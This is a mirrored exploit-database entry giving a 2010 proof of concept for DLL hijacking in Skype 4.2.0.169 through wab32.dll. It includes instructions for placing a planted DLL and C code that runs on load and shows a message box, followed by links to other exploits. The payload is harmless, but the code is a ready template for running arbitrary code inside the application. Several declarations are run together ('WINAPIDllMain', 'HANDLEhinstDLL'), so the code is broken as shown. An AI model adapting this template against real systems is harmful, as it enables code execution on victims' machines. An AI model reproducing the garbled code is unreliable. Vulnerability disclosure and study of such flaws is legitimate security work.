Skype 4.2.0.169 – ‘wab32.dll’ DLL Hijacking

Exploit Database
38 阅读

作者： Glafkos Charalambous

日期： 2010-08-25
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/14766/

/* 
Exploit Title: Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Skype v4.2.0.169
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .skype
Greetz: Astalavista, OffSEC, Exploit-DB
Notes: Create folders %commonprogramfiles%\system and place wab32.dll
 %commonprogramfiles(x86)% on x64 bit
*/


#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPIDllMain (
HANDLEhinstDLL,
DWORD fdwReason,
LPVOIDlpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}

last Exploits
Skype 4.2.0.169 – ‘wab32.dll’ DLL Hijacking的更多信息

Honestech VHS to DVD 3.0.30 Deluxe – Local Buffer Overflow (SEH)：
NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation：
VUPlayer – ‘.m3u’ Local Buffer Overflow (Metasploit)：
Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)：
FTPShell Client 5.24 – ‘Add to Favorites’ Buffer Overflow：
ActFax 10.10 – Unquoted Path Services：
Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)：
HTML Email Creator 2.42 build 718 – Local Buffer Overflow (SEH)：